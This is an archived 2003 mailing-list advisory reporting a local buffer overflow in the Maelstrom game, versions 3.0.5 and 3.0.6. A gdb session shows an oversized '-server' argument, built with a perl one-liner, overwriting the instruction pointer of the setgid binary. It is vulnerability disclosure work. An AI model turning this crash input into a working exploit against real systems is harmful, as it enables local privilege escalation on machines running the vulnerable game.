Maelstrom Buffer Overflow

From: Luca Ercoli (luca.ercoliat_private)
Date: Sun May 18 2003 - 06:52:04 PDT

  • Next message: bazarrat_private: "bazarr slocate"

    
     ('binary' encoding is not supported, stored as-is)
    Maelstrom is an arcade game. There is a buffer overflow vulnerability in 
    Maelstrom which allow local attacker 
    arbitrary code execution.
    
    Vulnerable systems: Maelstrom 3.0.6
    		    Maelstrom 3.0.5
    
    Example:
     
    [lucae@linux]$ gdb /usr/bin/Maelstrom 
    
    GNU gdb 5.2.1-2mdk (Mandrake Linux)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you 
    are
    welcome to change it and/or distribute copies of it under certain 
    conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i586-mandrake-linux-gnu"...
    
    (gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
    (gdb) r
    
    Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x 
    9999'`
    Couldn't resolve host name for ABCDABC......ABCD
    
    Program received signal SIGSEGV, Segmentation fault.
    0x41444342 in ?? ()
    
    (gdb) Quit
    
    
    
    Note: -rwxr-sr-x    1 root     games      171568 19 feb 
    03:38 /usr/bin/Maelstrom   in Linux Professional 9.0
    
    
    
    Luca Ercoli luca.ercoliat_private
    



    This archive was generated by hypermail 2b30 : Mon May 19 2003 - 14:08:53 PDT